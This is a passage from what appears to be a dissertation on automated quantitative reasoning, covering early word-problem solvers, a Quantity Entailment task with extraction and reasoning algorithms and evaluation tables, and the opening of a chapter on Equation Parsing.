follows: Ruth had 5 nuts more than Dan had. Ruth gave Dan 3 nuts. Dan gave 2 nuts to David. Now Dan has 4 nuts and David has 6 nuts. How many nuts does Ruth have now ? The concept of “schema” as used in the earlier works is adopted with further expansion of “change” schemas into six distinct categories as against only two used earlier. This fine grained categorization for change helped them to detect irrelevant numbers in the problem. The ROBUST simulation works by first parsing the problem text to split all sentences into propositions or simple sentences like “Ruth had 5 nuts more than Dan had”, “Ruth has ? nuts”, etc. for the above problem. The propositions having complex change verbs like “give” are further split into elementary ones (like “Ruth gave Dan 3 nuts” is split into “Ruth forfeited 3 nuts” and “Dan got 3 nuts”). Then the change schema relations are applied to the elementary propositions by substituting the constant values for the corresponding variables. Although it handles irrelevant numbers, ROBUST still restricts the operations to be addition and subtraction. A detailed discussion of these systems can be found in [Mukherjee and Garain, 2008], and indeed a lot of the examples were taken from that survey. All the systems described above have different restrictions in the types of problems they handle. Also, they do not perform evaluation on any benchmark datasets; some of the systems are also not publicly available. As a result, it is impossible to compare these systems. 16 3.2 Solvers for other Domains There were several systems developed also for related fields like Geometry, Physics, Chemistry and Calculus problems. Since they are less relevant for this dissertation, we only give a brief overview of these systems. • The program, CARPS i.e. Calculus Rate Problem Solver [Charniak, 1968] written by Eugene Charniak reads, solves calculus rate problems stated in English. • The system of HAPPINESS was developed by [Gelb, 1971] to solve simple probability questions. • The NEWTON program written by [de Kleer, 1977] is an expert problem solver in the domain of mechanics, specifically, relating to kinematics of objects moving on surface. • The program MECHO developed in Prolog by [Bundy et al., 1979] solves mechanics problems stated in English in the areas of pulley problems, statics problems, motion on smooth complex paths and motion under constant acceleration. • ISAAC program written by [Novak, 1976] can read, understand, solve and draw pictures of physics problems stated in English. • ALBERT developed by [Oberem, 1987] is an intelligent tutoring (CAI) system that not only under- stands and solves physics (more specifically kinematics) problems but can also teach a student how to solve them. 3.3 Recent Advances in Statistical Solvers All the methods discussed earlier in this chapter use some form of rule based systems to arrive at the output equation or answer. However, hand-engineered rules have an obvious drawback – they do not provide robustness to the variability of input text. Indeed, most of the early systems constrained their input to be of a few specific forms, which allowed them to develop transformation rules for problem solving. Recently, there has been a renewed interest in solving quantitative reasoning problems. It started in 2014 with the template based system of Nate Kushman [Kushman et al., 2014], which focused on solving algebra word problems. This was followed by the Aries system of Allen Institute for Artificial Intelligence (AI2), which focused on solving addition subtraction problems. All recent methods (including the work done in this thesis) use some form of machine learning to achieve robustness, something which earlier systems lacked. However, it should be noted that some of the challenges that were identified and ideas introduced by the 17 early works are still relevant for building robust statistical methods. Many of these ideas are used alongside statistical methods in this thesis. 18 Chapter 4 Quantity Entailment 4.1 Introduction In this chapter, we investigate the problem of reasoning with respect to quantities using only the local context. Consider the textual inference in Example 4.1, which we present as a Textual Entailment query [Dagan et al., 2013]. Example 4.1 T:A bomb in a Hebrew University cafeteria killed five Americans and four Israelis. H:A bombing at Hebrew University in Jerusalem killed nine people, including five Americans. To determine whether H is implied or entailed by T, we need to identify the quantities and the units from “five Americans” and “four Israelis”, as well as use the fact that “Americans” and “Israelis” are “people”. All these inferences can be made by processing local context of the quantities. In this chapter, we describe some key steps necessary to facilitate reasoning about quantities with local context. We first describe a system developed to recognize quantities in free form text, infer units associated with them and convert them to a standardized form. For example, in Example 4.2 About six and a half hours later , Mr. Armstrong opened the landing craft’s hatch. we would like to extract the number 6.5, the corresponding unit, “hour”, and also determine that the quantity describes an approximate figure, not an exact one. One of the difficulties is that any noun or noun phrase can be a unit, and inferring them requires analyzing contextual cues and local sentence structure. As we show, in some cases deeper NLP techniques are required to support that. We then develop a reasoning framework for quantities that we believe can play an important role in 19 general purpose textual inference. As an evaluation metric for local context based reasoning, we isolate the quantity reasoning component of the RTE task, and formulate Quantity Entailment (QE) – the task of determining whether a given quantity can be inferred from a given text snippet. We then describe our approach towards solving it. As an additional evaluation, we also show the effectiveness of our system on an application of QE, a search for ranges of currency values. Given a query range, say from 1 million USD to 3 million USD, we want to find all mentions of money with values in this range. Using standard search engine technology to query all values in the range, in the various forms they could be expressed, is not feasible. Instead, we use our proposed approach to extract monetary mentions from text and normalize them, and then we use QE to verify them against the query. We develop and annotate datasets1 for evaluation, and show that our approach can handle the aforemen- tioned reasoning tasks quite well. The next section presents some related work on quantities and reasoning. We then formally define a quantity and describe our knowledge representation. The following sections describe quantities extraction and standardization. We next present the formulation of Quantity Entailment, and describe our reasoning framework for it. 4.2 Related Work Quantities in Textual Entailment Quantities have been recognized as an important part of a textual entailment system [de Marneffe et al., 2008, Maccartney and Manning, 2008, Sammons et al., 2010], and [de Marneffe et al., 2008] claims that discrepancies in numbers are a common source of contradictions in natural language text. The authors describe a corpus of real-life contradictory pairs from multiple sources such as Wikipedia and Google News in which they found that 29% of the contradictions were due to numeric discrepancies. In addition, they analyzed several Textual Entailment datasets [Dagan et al., 2006] and found that numeric contradictions constitute 8.8% of contradictory entailment pairs. Monotonicity in Reasoning The reasoning framework described in this chapter borrows ideas of mono- tonicity.depends quantities often depends on reasoning about monotonicity. The role of monotonicity in NL reasoning has been described in [Barwise and Cooper, 1981]. The authors categorize noun phrases as upward 1The datasets are available for download at http://cogcomp.cs.illinois.edu/page/resource view/95. The related software is available at http://cogcomp.cs.illinois.edu/page/software view/Quantifier. 20 or downward monotonic, and also detect constructs where monotonicity depends on context. The large role of monotonicity in reasoning motivated attempts to reason directly at the surface level [Purdy, 1991], rather than converting first to logical forms. Our approach advocates this direction too. Representation of Quantities [Kuehne, 2004a] investigates the various cases in which physical quan- tities are represented in descriptions of physical processes. Later, in [Kuehne, 2004b], a system to extract Qualitative Process Theory [Forbus, 1984] representations is implemented for a controlled subset of the English language. While these approaches do not scale to unrestricted English, they have influenced the quantity representation that we use. 4.3 Representing Quantities In general, quantity refers to anything which is measurable. Our quantities representation is influenced by the one proposed in [Forbus, 1984] but we propose a simpler version of their Qualitative Process theory: Definition (Quantity-Value Representation) In Quantity-Value Representation (QVR), a quantity is represented as a triple (v,u,c), where constituents in the triple correspond, respectively, to: 1. Value: a numeric value, range, or set of values which measure the aspect, e.g. more than 500, one or two, thousands, March 18, 1986. The value can also be described via symbolic value (e.g., “below the freezing point”). We do not store surface forms explicitly, but convert them to a set or range. For example, “more than 500” is stored as the range (500, +∞). Details of these conversions are given in Section 4.4.2. 2. Units: a noun phrase that describes what the value is associated with. e.g., inches, minutes, bananas. The phrase “US soldiers” in the phrase “Five US soldiers” is a unit. 3. Change: specifies how the parameter is changing, e.g., increasing. This constituent often serves as an indication of whether or not the value is relative to another. For example, “She will receive an [additional 50 cents per hour]”, “The stock [increased 10 percent]”, “Jim has [5 balls more] than Tim”. 4.4 Extraction of Quantities In this section we describe the first component of our approach, that of identifying quantities and units in text and standardizing their representation. We use a a two step approach to extract quantities from free 21 form text. 1. Segmentation This step takes raw text and finds segments of contiguous text which describe quan- tities. 2. Standardization Using the phrases extracted in the previous step, we derive the QVR. An overview of our method is given in Algorithm 1. Algorithm 1 QuantityExtraction( T ) Input: Text T Output: Set of Quantity-value triples extracted from T 1: Q ←∅ 2: S ← Segmentation( T ) 3: for all segment s ∈ S do 4: q ← Standardization( s ) 5: if unit of q not inferred then 6: q ← InferUnitFromSemantics( q, s, T ) 7: end if 8: Q ← Q∪{q} 9: end for 10: return Q We model the segmentation step as a sequence segmentation task because quantities often appear as segments of contiguous text. We adapt and compare two approaches that were found successful in previous sequential segmentation work in NLP: 1. A Semi-CRF model [Sarawagi and Cohen, 2004], trained using a structured Perceptron algorithm [Collins, 2002], with Parameter Averaging [Freund and Schapire, 1998]. 2. A bank of classifiers approach [Punyakanok and Roth, 2001] that we retrain with a new set of features. The same feature set was used for both approaches. Despite the additional expressive power of CRFs, we found that the bank of classifiers (which is followed by a simple and tractable inference step) performs better for our task, and also requires significantly less computation time. 22 4.4.1 Features For each token xi in the input sequence we extract the following features: 1. Word class features: xi appears in a list of known scientific units (e.g., meters, Fahrenheit), written numbers (e.g., two, fifteen), names of a months, day of the week, miscellaneous temporal words (e.g. today, tomorrow), currency units, etc. 2. Character-based: xi contains a digit, is all digits, has a suffix (st,nd,rd,th). 3. Part of speech tags: we use the Illinois POS Tagger [Roth and Zelenko, 1998]. 4. Most of the features were generated from a window of [−3, 3] around the current word. Additional features were generated from these by conjoining them with offset values from the current word. 4.4.2 Mapping Text Segments into QVR We develop a rule-based standardization step, that is informed, as needed, by deeper NL processing, including semantic role labeling (SRL, [Palmer et al., 2010]) and Co-reference resolution. Some key steps of this procedure are as follows: 1. Convert written numbers to floating point: e.g., three thousand five hundred twenty → 3520.0 2. Convert dates to an internal date type: e.g., March 18th → Date(03/18/XXXX) 3. Replace known names for ranges: e.g., teenage → [13, 19] years-old. 4. Convert all scientific units to a standard base unit: e.g., 1 mile → 1609.344 meters. 5. Replace non-scientific units with WordNet synsets 6. Rewrite known units to a standard unit: e.g., USD, US$, dollars → US$. 7. Standardize changing quantity: e.g., “additional 10 books” → +10 [book]. 8. Extract bounds: we use a list of phrases, such as “more than”, “less than”, “roughly”, “nearly”. By default, if a bound keyword is not present we assume the bound is “=”. 9. Modify value using bounds : We convert values which have a bound to a range of values. 23 Scalar implicature is taken into consideration here. Consider the sentence “John bought 10 books.”, although it can be interpreted that buying 5 books is a corollary of buying 10, in this case, we make the assumption that 5 books were not purchased. See section 4.5.2 for a discussion on the subject. We use the following rules, where v is the value extracted before using bound information. • ≤ v → (−∞,v], similarly for ≥,<,>. • = v →{v} • ≈ v → [v − c.v,v + c.v], we use c = 0.2. 4.4.3 Extraction of Units In most cases, the units related to the numeric values appear adjacent to them. For example, in the sentence “There are two books on the table”, the unit “book” follows “two”. The sequence segmentation groups these words together, from which it is easy to extract the unit. However, in some cases, a better understanding of the text is needed to infer the units. Consider the following example: Example 4.3 A report from UNAIDS, the Joint United Nations Program on HIV/AIDS, released on Tuesday, shows the number of adults and children with HIV/AIDS reached 39.4 million in 2004. Here, we need to know that “39.4 million” refers to “the number of adults and children with HIV/AIDS”. Also, in: Example 4.4 The number of member nations was 80 in 2000, and then it increased to 95. we need to know that the pronoun “it” refers to “the number of member nations”. We employ a sequential process in our standardization. In case the first step described above fails to extract units, we make use of deeper processing of the sentence to accomplish that (see an evaluation of the contribution of this in the experimental section). These steps are denoted by the function InferUnitFrom- Semantics() in Algorithm 1. We apply coreference resolution to identify pronoun referents and then apply a Semantic Role Labeler, to recognize which terms are associated with the quantity, and can be potential units. In the case of example 4.3, the SRL tells us that for the verb “reached”, the associated subject is “the 24 number of adults and children with HIV/AIDS” and the object is the mention “39.4 million”. Hence, we conclude that the subject can be a candidate for the unit of “39.4 million”. For the purpose of entailment, we keep the entire set of possible word chunks, which are linked by the SRL to our quantity mention, as candidate units. Since most units are found in positions adjacent to the numeric mention, we optimize on runtime by ap- plying the SRL and coreference resolver only when the segmented chunk does not have adequate information to infer the unit. We use the Illinois Coreference Resolver ([Bengtson and Roth, 2008], [Kai-Wei Chang and Roth, 2013]) and the Illinois SRL [Punyakanok et al., 2008], for coreference and seman- tic role labelling, respectively. 4.5 Quantity Entailment In this section we describe our approach to quantitative reasoning using local context of quantities. We first formulate the task of Quantity Entailment, and then describe our reasoning framework. Definition (Quantity Entailment) Given a text passage T and a Quantity-Value triple h(ch,vh,uh), Quantity Entailment is a 3-way decision problem: 1. entails: there exists a quantity in T which entails h. 2. contradicts: no quantity in T entails h, but there is a quantity in T which contradicts h. 3. no relation: there exists no quantity in T, which is comparable with h. Since the decision is about a single quantity-value triple, we believe this will test the capability to capture local contextual cues of the quantity. This task can also be seen as a building block for a general textual entailment system. The need to identify sub-problems of textual inference, in the context of the RTE task, has been motivated by [Sammons et al., 2010]. Quantity Entailment can be considered as one such step. Since we envision that our QE module will be one module in an RTE system, we expect that the RTE system will provide it with some control information. For example, it is often important to know whether the quantity is mentioned in an upward or downward monotonic context. Since we are evaluating our QE approach in isolation, we will always assume upward monotonicity, which is a lot more common. Monotonicity has been modeled with some success in entailment systems [Maccartney and Manning, 2008], thus providing a clear and intuitive framework for incorporating an inference resource like the Quantity Entailment module into a full textual entailment system. 25 4.5.1 Reasoning Framework Our Quantity Entailment process has two phases: Extraction and Reasoning. In the Extraction Phase, we take a text passage T and extract Quantity-Value triples (value, units, change) from it. In the Reasoning phase, we apply a lightweight logical inference procedure to the triples extracted from T to check if h can be derived. There are two types of rules applied in the Reasoning phase: Implicit Quantity Productions and Quantity Comparisons. The combination of these rules provides good coverage for the QE task. Quantity Comparison Quantity Comparison compares a quantity t : (vt,ut,ct) extracted from T and the quantity h : (vh,uh,ch) and decides whether h can be derived via some truth preserving transformation of t. There are three possibilities: (t entails h), (t contradicts h), or (t has no relation with h). The overview is given in Alg. 2, which is designed under our assumption that entailing quantities should respect upward monotonicity. This requires monotonicity verification of both units and values. In order for a quantity to contradict or entail another, their units must be comparable. Determining the comparability of scientific units is direct since they form a closed set. Comparing non-scientific units is more involved. The inference rule used here is as follows: if the syntactic heads of the unit phrases match (i.e., there is an Is-A or synonymy relation in either direction), then the phrases are comparable. These comparisons are encoded as a function comparableUnits(ut, uh), which returns true if the units ut and uh are comparable, or else returns false. If the units are comparable, the direction of monotonicity (i.e., the direction of the Is-A relation between the heads and the effects of any relevant modifiers) is verified. The function checkMonotonicityOfU- nits(ut, uh) returns true, if ut is more specific than uh, false otherwise. To compute the Is-A and synonymy relations we use WordNet [Miller et al., 1990], an ontology of words which contains these relations. We also augment WordNet with two lists from Wikipedia (specifically, lists of Nationalities and Jobs). Next, we check whether the values of the quantities compared obey the monotonicity assumption; we say that vt is more specific than vh if vt is a subset of vh. (Note that vt and vh are both represented as sets and hence, checking subset relation is straightforward.) For example, “more than 50” ⊆ “at least 10”. This rule also applies to dates, e.g. “03/18/1986” ⊆ “March 1986”. Respecting scalar implicature, we assume that “5” is subset of “less than 10”, but not “10”. Similar to the case of units, we use the function 26 checkMonotonicityOfValues(vt, vh) which returns true, if vt is more specific than vh, and false otherwise. A quantity which represents some form of change of a quantity cannot be derived from a quantity which does not represent change and vice versa. We set ct = true if t denotes change in a quantity, otherwise we set ct = false. Algorithm 2 QuantityComparison( t, h ) Input: Quantity-value triples t(vt,ut,ct) and h(vh,uh,ch) Output: Returns whether t entails, contradicts or has no relation with h 1: if ct 6= ch then 2: return no relation 3: end if 4: if comparableUnits( ut, uh )= false then 5: return no relation 6: end if 7: if checkMonotonicityOfUnits( ut, uh )= true then 8: if checkMonotonicityOfValues( vt, vh )= true then 9: return entails 10: end if 11: end if 12: return contradicts Implicit Quantity Production Rules There are many relationships among quantities which can be the source of implicit information. The following is an incomplete, but relatively broad coverage list of common patterns: 1. Range may imply duration, e.g., “John lived in Miami from 1980 to 2000” implies that John lived in Miami for a duration of 20 years. 2. Compatible terms may be combined and abstracted. The sentence “I bought 3 bananas, 2 oranges, and 1 apple” implies that 6 fruits were purchased. 3. Ratios can imply percentages. The sentence “9 out of the 10 dentists interviewed recommend brushing your teeth” implies that 90% of the dentists interviewed recommend brushing. 27 4. Composition: Quantities and units may sometimes be composed. Consider the following examples, the phrase “six Korean couples” means that there are 12 people; the phrase “John gave six 30-minute speeches” implies that John spoke for 180 minutes. The rules used for producing implicit quantities employed in our system are the following: • (a ratio b) if a is a percentage, then multiply its value with the value of b to obtain a new quantity with the units of b. • (a ratio b) if a is not percentage, divide its value with the value of b to obtain a new quantity with the units of b. • (a range b) take the difference of the two values to obtain a new quantity with the appropriate change of units, e.g., time-stamp minus time-stamp results in units of time. Algorithm 3 QuantityEntailment( T, h ) Input: Text T and a quantity-value triples h(vh,uh,ch) Output: Returns whether T entails, contradicts or has no relation with h 1: Q ← QuantityExtraction( T ) 2: Q′ ← GenerateImplicitQuantities( Q ) 3: Q ← Q∪Q′ 4: contradict ← false 5: for all quantity-value triple q ∈ Q do 6: if QuantityComparison( q, h )= entails then 7: return entails 8: end if 9: if QuantityComparison( q, h )= contradicts then 10: contradict← true 11: end if 12: end for 13: if contradict= true then 14: return contradicts 15: else 16: return no relation 17: end if 28 Lightweight Logical Inference The QE inference procedure simply applies each of the implicit quantity production rules to the Quantity- Value triples extracted from the passage T, until no more quantities are produced. Then it compares each quantity t extracted from T with the quantity h, according to the quantity comparison rules described in Algorithm 2. If any quantity in T entails h, then “entails” is reported; if there is no quantity in T which can explain h, but there exists one which contradicts h, then “contradiction” is reported; otherwise “no relation” is reported. The complete approach to Quantity Entailment is given in Algorithm 3. 4.5.2 Scope of QE Inference Our current QE procedure is limited in several ways. In all cases, we attribute these limitations to subtle and deeper language understanding, which we delegate to the application module that will use our QE procedure as a subroutine. Consider the following examples: T : Adam has exactly 100 dollars in the bank. H1 : Adam has 50 dollars in the bank. H2 : Adam’s bank balance is 50 dollars. Here, T implies H1 but not H2. However for both H1 and H2, QE will infer that “50 dollars” is a contradiction to sentence T, since it cannot make the subtle distinction required here. T : Ten students passed the exam, but six students failed it. H : At least eight students failed the exam. Here again, QE will only output that T implies “At least eight students”, despite the second part of T. QE reasons about the quantities, and there needs to be an application specific module that understands which quantity is related to the predicate “failed”. There also exists limitations regarding inferences with respect to events that could occur over a period of time. In “It was raining from 5 pm to 7 pm” one needs to infer that “It was raining at 6 pm” although “6 pm” is more specific than “5 pm to 7 pm”. There is a need to understand the role of associated verbs and entities, and the monotonicity of the passages to infer the global entailment decision. Many of these challenges will be handled in the later chapters of the thesis. 29 4.6 Experimental Study In this section, we seek to validate our proposed modeling. We evaluate our system’s performance on four tasks: Quantity Segmentation, Quantity Entailment and Currency Range Search. We do not directly evaluate our system’s ability to map raw text segments into our representation, but instead evaluate this capability extrinsically, in the context of the aforementioned tasks, since good Standardization is necessary to perform quantitative inference. 4.6.1 Datasets QE: Due to lack of related work, an adequately annotated corpus does not exist. Thus, in order to evaluate our system, we used two collections: 1. Sub-corpus of the RTE Datasets We choose text-hypothesis pairs from RTE2–RTE4 datasets, which have quantity mentions in the hypothesis. Overall, we selected 384 text-hypothesis pairs with quantities in the hypothesis. 2. Newswire Text 600 sentences of newswire text were selected, all containing quantity mentions. Both these datasets were manually annotated with the phrase boundaries of quantity mentions and had an inter-annotator agreement of 0.91. We restricted annotation to contiguous segments of text. No instances of implicit quantities were annotated. We also did not annotate these mentions with QVRs. Limiting the annotations to contiguous spans of text results in a few instances of quantities which contain missing information, such as missing or ambiguous units, and several range and ratio relationships which were not annotated (e.g., we do not annotate the range expressed in “from [5 million] in [1995] to [6 million] in [1996]”, but do so in “[from 5 million to 6 million]”). In the RTE sub-corpus we also annotated entailment pairs with information about which quantities entail, in addition to the boundary information. For each quantity in the hypothesis we labeled it as either “entails”, “no relation”, or “contradicts”, with an inter-annotator agreement of 0.95. There were 309 entailing quantities, 71 contradicting quantities and 56 quantities which were unrelated to the corresponding text. We also maintained the information about general entailment, that is, whether the hypothesis can be explained by the text. An example of an annotated RTE example is shown below. 30 Annotation Example for RTE sub-corpus T:A bomb in a Hebrew University cafeteria killed [five Americans] and [four Israelis]. H:A bombing at Hebrew University in Jerusalem killed [nine people], including [five Americans]. “nine people” : entails “five Americans” : entails Global entailment decision : entails Although we limit our scope to infer the entailment decision for individual quantities mentioned in hypothesis, we hope to see future approaches use these individual decisions and combine them appropriately to obtain the global entailment decision. Currency Search We developed a new dataset for evaluating currency search. Queries of various amounts of money like “1000$”, “USD 2 million”, etc. were made on a search engine, and paragraphs containing monetary mentions were taken from the top search results. We collected 100 paragraphs containing various mentions of monetary values, and labeled them with the amount mentioned in them. We restricted the denominations to US dollars. The inter-annotator agreement was 0.98. 4.6.2 Quantity Segmentation We evaluate the phrase boundary recognizer on the annotated RTE and newswire datasets described in the previous section, using the phrase-based F1 score. We compare the accuracy and running times of the Semi-CRF model (SC) [Sarawagi and Cohen, 2004] and the bank of classifiers model (C+I) (PR) [Punyakanok and Roth, 2001], using 10-fold cross-validation. Note that the standardizer can often recover from mistakes made at the segmentation level. Therefore, this performance does not necessarily upper bound the performance of the next step in our pipeline. The segmentation we are aiming for does not directly follow from syntactic structure of a sentence. For example, in the sentence “ The unemployment rate increased 10%”, we would like to segment together “increased 10%”, since this tells us that the quantity denotes a rise in value. Also, in the sentence “Apple restores push email in Germany, nearly two years after Motorola shut it down” we would like to segment together ”nearly two years after” . We consider a quantity to be correctly detected only when we have the exact phrase that we want, otherwise we consider the segment to be undetected. 31 Model P% R% F% Train Test Time Time Semi-CRF (SC) 75.6 77.7 76.6 15.8 1.5 C+I (PR) 80.3 79.3 79.8 1.0 1.0 Table 4.1: 10-fold cross-validation results of segmentation accuracy and time required for segmentation, the columns for runtime have been normalized and expressed as ratios Table 4.1 describes the segmentation accuracy, as well as the ratio between the time taken by both approaches. The bank of classifiers approach gives slightly better accuracy than the semi-CRF model, and is also significantly faster. 4.6.3 Quantity Entailment We evaluate the complete Quantity Entailment system, determining the overall loss due to the segmentation, as well as the contribution of the Coreference Resolver and SRL. We show the performance of 4 systems. 1. GoldSeg : Uses gold segmentation, and does not use SRL and Coreference Resolver. 2. GoldSeg+Sem : Uses gold segmentation, and also uses SRL and Coreference Resolver to infer units. 3. PredSeg : Performs segmentation, and does not use SRL and Coreference Resolver. 4. PredSeg+Sem : Performs segmentation, and uses SRL and Coreference Resolver. The baseline is an exact string matching algorithm. It answers “entails” if the quantity unit and value are present in the text, and answers “contradicts” if only the unit matches and the value does not. Otherwise, it returns “no relation”. The results are shown in Table 4.2. Note that exact match only supports 43.3% of the entailment decisions. It is also evident that the deeper semantic analysis using SRL and Coreference improves the quantitative inference. 32 Task System P% R% F% Entailment Baseline 100.0 43.3 60.5 GoldSeg 98.5 88.0 92.9 +Sem 97.8 88.6 93.0 PredSeg 94.9 76.2 84.5 +Sem 95.4 78.3 86.0 Contradiction Baseline 16.6 48.5 24.8 GoldSeg 61.6 92.9 74.2 +Sem 64.3 91.5 75.5 PredSeg 51.9 79.7 62.8 +Sem 52.8 81.1 64.0 No Relation Baseline 41.8 71.9 52.9 GoldSeg 81.1 76.7 78.8 +Sem 80.0 78.5 79.3 PredSeg 54.0 75.4 62.9 +Sem 56.3 72.7 63.5 Table 4.2: Results of QE; Adding Semantics(+SEM) consistently improves performance; Only 43.3% of entailing quantities can be recovered by simple string matching 4.6.4 Currency Range Search Table 4.3 shows the performance of our system in detecting currency phrases. We evaluate our system on the proportion of monetary mentions it recognized and standardized correctly from queried ranges of currency values, and report micro-averaged scores. Note that range search is a direct application of QE, where the quantity is a range of values, and the text is the corpus we want to search. All instances of “entails” correspond to search hits. The baseline here is also a string matching algorithm, which searches for numbers in the text. System P% R% F% Baseline 72.0 69.2 70.5 PredSeg+Sem 96.0 93.5 94.8 Table 4.3: Micro-averaged accuracy in detecting monetary mentions 33 4.6.5 Qualitative Analysis The segmentation module made mistakes in detecting exact boundaries for uncommon phrases, e.g., “hun- dreds of thousands of people”, and “mid-1970’s”. Detection of missing units is problematic in cases like “Three eggs are better than two”. The SRL returns “Three eggs” as a candidate unit, which needs to be pruned appropriately to obtain the correct unit. The primary limitation of the reasoning system in both tasks is the lack of an extensive knowledge base. Wordnet based synsets prove to be insufficient to infer whether units are compatible. Also, there are certain reasoning patterns and various implicit relations be- tween quantities which are not currently handled in the system. For example, inferring from the sentence “Militants in Rwanda killed an [average of 8,000 people per day] for [100 days]” that “around 800,000 peo- ple were killed”. Also, implication of ratios can be involved. For example, the sentence “[One out of 100 participating students] will get the award” implies that there were “100 participating students”, whereas “[9 out of 10 dentists] recommend brushing” does not imply there were 10 dentists. 4.7 Conclusion We studied reasoning about quantities in natural language text, with respect to local context. We have iden- tified and defined an interesting and useful slice of the Textual Entailment problem, the Quantity Entailment task. Since this problem involves inferences about individual quantities, it allows us to capture quantitative reasoning with respect to local context. Our ability to support local context based quantitative reasoning builds on a method we proposed for detecting and normalizing quantities in unrestricted English text; we developed a framework to remove variability and ambiguity from unstructured text by mapping it into a representation which makes reasoning more tractable. Once quantities are mapped into our representation, we can support the reasoning required by Quantity Entailment. 34 Chapter 5 Equation Parsing 5.1 Introduction We now expand our focus from the local context of numbers, to consider entire sentences. We investigate how numbers interact with the entities, verbs and other components of the sentence. In particular, we investigate how we can extract numeric relations expressed in sentences, along with the arguments for those relations. Extracting numeric relations from sentences is a key requirement for natural language understanding . As an example, consider the news article statement in Example 5.1. Understanding it requires identifying relevant entities and the mathematical relations expressed among them in text, and determining how to compose them. Similarly, solving a math word problem with a sentence like Example 5.2, requires realizing that it deals with a single number, knowing the meaning of “difference” and composing the right equation – “25” needs to be subtracted from a number only after it is multiplied by 3. Example 5.1 Emanuel’s campaign contributions total three times those of his opponents put together. Example 5.2 Twice a number equals 25 less than triple the same number. Example 5.3 Flying with the wind , a bird was able to make 150 kilometers per hour. Example 5.4 The sum of two numbers is 80. Example 5.5 There are 54 5-dollar and 10-dollar notes. As a first step towards understanding such relations, we introduce the Equation Parsing task - given a sentence expressing a mathematical relation, the goal is to generate an equation representing the relation, and to map the variables in the equation to their corresponding noun phrases. To keep the problem tractable, we restrict the final output equation form to have at most two (possibly coreferent) variables, and assume that each quantity mentioned in the sentence can be used at most once in the final equation.1 In example 5.1, the gold output of an equation parse should be V1 = 3×V2, with V1 = “Emanuel’s campaign contributions” 1We empirically found that around 97% of sentences describing a relation have this property. 35 and V2 = “those of his opponents put together”. The task can be seen as a form of semantic parsing [Goldwasser and Roth, 2011, Kwiatkowski et al., 2013] where instead of mapping a sentence to a logical form, we want to map it to an equation. However, there are some key differences that make this problem very challenging in ways that differ from the “standard” semantic parsing. In Equation Parsing, not all the components of the sentence are mapped to the final equation. There is a need to identify noun phrases that correspond to variables in the relations and determine that some are irrelevant and can be dropped. Moreover, in difference from semantic parsing into logical forms, in Equation Parsing multiple phrases in the text could correspond to the same variable, and identical phrases in the text could correspond to multiple variables. We call the problem of mapping noun phrases to variables the problem of grounding variables. Grounding is challenging for various reasons, key among them are that: (i) The text often does not mention “variables” explicitly, e.g., the sentence in example 5.3 describes a mathematical relation between the speed of bird and the speed of wind, without mentioning “speed” explicitly. (ii) Sometimes, multiple noun phrases could refer to the same variable. For instance, in example 5.2, both “a number” and “the same number” refer to the same variable. On the other hand, the same noun phrase might refer to multiple variables, as in example 5.4, where the noun phrase “two numbers” refer to two variables. In addition, the task involves deciding which of the quantities identified in the sentence are relevant to the final equation generation. In example 5.5, both “5” and “10” are not relevant for the final equation “V1 +V2 = 54”. Finally, the equation needs to be constructed from a list of relevant quantities and grounded variables. Overall, the output space becomes exponential in the number of quantities mentioned in the sentence. Determining the final equation that corresponds to the text is an inference step over a very large space. To address this, we define the concept of “projectivity” - a condition where the final equation can be generated by combining adjacent numbers or variables, and show that most sentences expressing mathematical relations exhibit the projectivity property. Finally, we restrict our inference procedure to only search over equations which have this property. Our approach builds on a pipeline of structured predictors that identify irrelevant quantities, recognize coreferent variables, and, finally, generate equations. We also leverage a high precision lexicon of math- ematical expressions and develop a greedy lexicon matching strategy to guide inference. We discuss and exemplify the advantages of this approach and, in particular, explain where the “standard” NLP pipeline fails to support equation parsing, and necessitates the new approach proposed here. Another contribution 36 of this work is the development of a new annotated data set for the task of equation parsing. We evaluate our method on this dataset and show that our method predicts the correct equation in 70% of the cases and that in 60% of the time we also ground all variables correctly. The next section presents a discussion of related work. Next we formally describe the task of equation parsing. The following sections describe our equation representation and the concept of projectivity, followed by the description of our algorithm to generate the equations and variable groundings from text. We conclude with experimental results. 5.2 Related Work The work most related to this work is [Madaan et al., 2016], which focuses on extracting relation triples where one of the arguments is a number. In contrast, our work deals with multiple variables and com- plex equations involving them. This work is also conceptually related to work on semantic parsing – map- ping natural language text to a formal meaning representation [Wong and Mooney, 2007, Clarke et al., 2010, Cai and Yates, 2013, Kwiatkowski et al., 2013, Goldwasser and Roth, 2011]. However, as mentioned earlier, there are some significant differences in the task definition that necessitate the development of a new ap- proach. 5.3 The Equation Parsing Task Equation parsing takes as input a sentence x describing a single mathematical equation, comprising one or two variables and other quantities mentioned in x. Let N be the set of noun phrases in the sentence x. The output of the task is the mathematical equation described in x, along with a mapping of each variable in the equation to its corresponding noun phrase in N. We refer to this mapping as the “grounding” of the variable; the noun phrase represents what the variable stands for in the equation. Table 5.1 gives an example of an input and output for the equation parsing of the text in example 5.2. Since an equation can be written in various forms, we use the form which most agrees with text, as our target output. So, for example 5.1, we will choose V1 = 3 ×V2 and not V2 = V1 ÷ 3. In cases where several equation forms seem to be equally likely to be the target equation, we randomly choose one of them, and keep this choice consistent across the dataset. 37 The Equation Parsing Task Input Twice a number equals 25 less than triple the same number. Output 2 ×V1 = (3 ×V1) − 25 (Equation) V1 = “a number” (Grounding) Table 5.1: Input and output for Equation Parsing 5.3.1 Equation Parse Representation Twice a number equals 25 less than triple the same number.Sentence Trigger List Equation Tree 2 V1 25 3 V1 × = −r × Figure 5.1: A sentence with its trigger list and equation tree. −r indicates subtraction with order rl. In this section, we introduce an equation parse for a sentence. An equation parse of a sentence x is a pair (T,E), where T represents a set of triggers extracted from x, and E represents an equation tree formed with the set T as leaves. We now describe these terms in detail. Trigger Given a sentence x mentioning a mathematical relation, a trigger can either be a quantity trig- ger expressed in x, or variable trigger which is a noun phrase in x corresponding to a variable. A quantity trigger is a tuple (q,s), where q is the numeric value of the quantity mentioned in text, and s is the span of text from the sentence x which refers to the quantity. A variable trigger is a tuple (l,s), where l represents the label of the variable, and s represents the noun phrase representing the variable. For example, for the sentence in Fig 5.1, the spans “Twice”, “25”, and “triple” generate quantity triggers, whereas “a number” and “the same number” generate variable triggers, with label V1. Trigger List The trigger list T for a sentence x contains one trigger for each variable mention and each nu- meric value used in the final equation expressed by the sentence x. The trigger list might consist of multiple triggers having the same label, or extracted from the same span of text. In the example sentence in Fig 5.1, 38 the trigger list comprises two triggers having the same label V1. The final trigger list for the example in Fig 5.1 is {(2, “2”), (V1, “a number”), (25, “25”), (3, “triple”), (V1, “the same number”)}. Note that there can 